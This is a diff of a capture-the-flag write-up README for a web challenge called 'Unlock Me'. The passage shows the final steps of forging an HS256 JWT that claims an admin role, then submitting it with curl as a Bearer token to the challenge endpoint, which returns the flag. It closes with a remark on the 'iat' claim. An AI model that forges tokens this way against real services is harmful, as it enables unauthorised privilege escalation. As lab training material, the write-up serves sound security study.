redfl4g/StackTheFlags/Web/Unlock_Me/README.md

 #### Step 9
-Signed and modified JWT Token
+Piece together your JWT, appending the JWT Signature from **Step 8** to your JWT Header and JWT Payload
 - ```eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1pbmlvbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYwNzQyNDIwMX0.LSkSSZ6LY-htc7vlH3beym-JaTnRr8egUzft7UEjENQ```

 #### Step 10
+Submit the token as a Bearer token to the endpoint ```http://yhi8bpzolrog3yw17fe0wlwrnwllnhic.alttablabs.sg:41031/unlock``` and retrieve the flag!
 ```bash
 redfl4g@kali$ curl -X GET -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1pbmlvbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYwNzQyNDIwMX0.LSkSSZ6LY-htc7vlH3beym-JaTnRr8egUzft7UEjENQ" http://yhi8bpzolrog3yw17fe0wlwrnwllnhic.alttablabs.sg:41031/unlock

 {"flag":"govtech-csg{5!gN_0F_+h3_T!m3S}"}
 ```
 > Note: The "iat" parameter specified in the JWT Payload is an ["Issued at" Claim](https://tools.ietf.org/html/rfc7519#page-10).
-This means that there is a possibility that JWT tokens are also verified based on their age, and can expire, thereby invalidating the token
+This means that there is a possibility that JWT tokens are also verified based on their age, and can expire, thereby invalidating the token.
+This also means that, as the "iat" time changes, so will the JWT signature, because of the SHA256 hashing algorithm used in HS256 (and RS256).

 <br>